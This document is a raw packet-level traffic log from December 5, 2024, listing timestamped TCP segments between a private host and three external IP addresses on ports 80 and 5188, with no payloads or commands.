                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998574972 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998580933 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998588085 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998594046 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998606920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998615980 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998620033 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998632908 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998644114 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998644114 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998656034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998657942 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.998683929 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999293089 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999305964 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999326944 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999326944 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999339104 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999352932 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999355078 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999372959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999402046 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999531031 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999562025 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999741077 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999752998 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999764919 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999777079 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999787092 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999789953 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999802113 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999814034 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999826908 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999829054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999829054 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999838114 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999849081 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999860048 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999867916 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999871969 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999883890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999897003 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999897957 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999910116 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999917984 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999917984 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.999954939 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000505924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000519991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000613928 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000653028 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000665903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000678062 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000689030 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000700951 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000714064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000719070 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000725985 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000739098 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000745058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000745058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000751972 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000766039 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000768900 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000778913 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000791073 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000802994 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000834942 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.000834942 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001343966 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001391888 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001404047 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001418114 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001435995 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001445055 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001445055 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001478910 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001529932 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001545906 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001557112 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001569033 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001580954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001594067 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001600981 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001607895 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001620054 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001629114 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001631975 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001646042 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001650095 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001650095 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001658916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.001688957 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002430916 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002444983 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002456903 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002485991 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002543926 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002624989 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002650023 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002690077 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002760887 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002773046 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002784014 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002795935 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002808094 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002820969 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002824068 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002835035 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002854109 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002855062 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002868891 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002868891 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002881050 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002888918 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002895117 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002907991 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002919912 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002928019 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002928019 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002933979 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.002969027 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003604889 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003618002 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003629923 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003640890 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003650904 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003655910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003669977 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003670931 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.003709078 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.004277945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.004488945 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.004564047 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.005368948 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.005534887 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.005573034 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.015522957 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.015758991 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.016661882 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.016716003 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096386909 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096467018 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096514940 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096528053 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096576929 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096852064 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096894979 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.096921921 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.097748995 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098015070 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098120928 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098162889 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098342896 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098407984 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098457098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098496914 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098779917 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.098824978 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099021912 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099059105 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099498987 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099673986 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099721909 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099961042 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099972963 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.099999905 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100016117 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100277901 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100287914 CET8049800185.215.113.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100305080 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100330114 CET4980080192.168.2.11185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100369930 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.100409985 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101105928 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101142883 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101231098 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101264954 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101360083 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.101377010 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102148056 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102245092 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102323055 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102490902 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102504015 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102539062 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102541924 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.102576971 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103437901 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103494883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103535891 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103565931 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103667974 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.103743076 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104571104 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104613066 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104736090 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104753017 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104767084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104779959 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.104803085 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105698109 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105743885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105765104 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105784893 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105880022 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.105961084 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.106002092 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.106847048 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.106892109 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.106919050 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.106952906 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.107034922 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.107153893 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.107743025 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108010054 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108100891 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108160973 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108172894 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108201027 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108321905 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.108362913 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109330893 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109379053 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109391928 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109417915 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109455109 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.109489918 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110441923 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110483885 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110483885 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110516071 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110642910 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110654116 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.110682011 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111514091 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111557961 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111577034 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111594915 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111613989 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111628056 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.111700058 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112616062 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112711906 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112765074 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112855911 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112871885 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.112912893 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113782883 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113847017 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113858938 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113873005 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113898039 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113940954 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.113984108 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.114965916 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115011930 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115021944 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115034103 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115057945 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115143061 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.115186930 CET497925188192.168.2.1192.255.85.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.116092920 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.116183043 CET8049793185.215.113.84192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.116195917 CET51884979292.255.85.66192.168.2.11
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.116224051 CET4979380192.168.2.11185.215.113.84
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:16.116328955 CET51884979292.255.85.66192.168.2.11
